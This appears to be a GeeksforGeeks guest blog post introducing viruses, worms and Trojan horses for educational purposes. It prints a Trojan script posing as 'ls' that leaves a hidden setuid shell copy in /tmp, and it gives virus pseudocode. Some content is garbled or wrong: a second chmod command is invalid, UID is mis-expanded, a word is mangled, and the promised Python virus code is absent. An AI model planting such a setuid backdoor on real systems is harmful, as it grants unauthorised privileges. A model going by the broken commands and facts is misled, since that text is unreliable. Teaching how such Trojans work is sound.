Viruses – From Newbie to pro
NOTE: Using an online compiler is not going to work here. Please install Python 2.7x and cv2, argparse modules to actually try out this example.
Heya friends! Welcome back! Before continuing on with Malicious Logic, I request you to have a look at this great and informative article Worms, Viruses and Beyond!!
Now, this article will focus more on applications than theory of computer viruses, worms, and Trojan horses.
But, please note that this article is meant to be used for educational purposes only.I, in no way, promote the usage of viruses, worms, or trojan horses to attack computer systems and causing damage.
Malicious logic is a set of instructions (basically a program) that causes the violation of a security policy of a website/program/application, etc.
cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm ./ls ls $*
In this example, we are assuming that “.” is in the path environment and the script has been named ls and is placed in the directory.
Analysing the script
This script creates a copy of the UNIX Shell that is setuid of the user executing this program. To understand setuid programs, we first need to understand how User Identity is stored in a UNIX OS.
In UNIX OS, user identity is usually represented as an integer between 0 and generally, 65,535. This number is also referred to as UID (Unique Identification Number). Now, what setuid programs do is that they create processes with UID of the owner and not of a third person executing the program. This means, that an executor will have the rights of the owner… This in itself is a possible vulnerability.
Coming back to our script, so a setuid copy of the UNIX shell was created. Later on, this program is deleted, and then the correct ls command (for listing the files and folders present in the current working directory) is executed.
Go back to the previouspt… Suppose if someone (root) typed:
cp /bin/sh /tmp/.xxsh chmod o+s,w+x /tmp.xxsh
If the script was typed deliberately, then it will result in a Trojan Horse.
Virus – A basic format
Most of the computer viruses follow the following basic script:
Beginvirus if spread-condition TRUE then begin for the target files begin if target affected TRUE then begin Determine where to place virus instructions Copy the virus instructions Modify target to spread the virus later End if End for End if Perform some other instruction(s) //Optional Go back to beginning Endvirus
Basically, every computer virus has two phases –
- Insertion phase – in this phase, the virus inserts itself into the target.
- Execution phase- in this phase, the virus performs some actions.
Let’s take a look at a real virus in Python. Now this is not an actual virus which will cause corruption files, deletion of system files, etc. but just a simple harmless virus.
Now, this is quite a safe virus But, the basic format and working is the same.
Also, there are various types of computer virus – Boot sector infectors, executable infectors, multipartite virus, TSR virus, Stealth virus, Encrypted virus, polymorphic virus, macro virus.
Now, I won’t go into the details and will just stop here. That’s all from my side!
About the author:
Vishwesh Shrimali is an Undergraduate Mechanical Engineering student at BITS Pilani. He fulfils about all the requirements not taught in his branch- white hat hacker, network security operator, and an ex – Competitive Programmer. As a firm believer in power of Python, his majority work has been in the same language. Whenever he get some time apart from programming, attending classes, watching CSI Cyber, he go for a long walk and play guitar in silence. His motto of life is – “Enjoy your life, ‘cause it’s worth enjoying!”
If you also wish to showcase your blog here, please see GBlog for guest blog writing on GeeksforGeeks.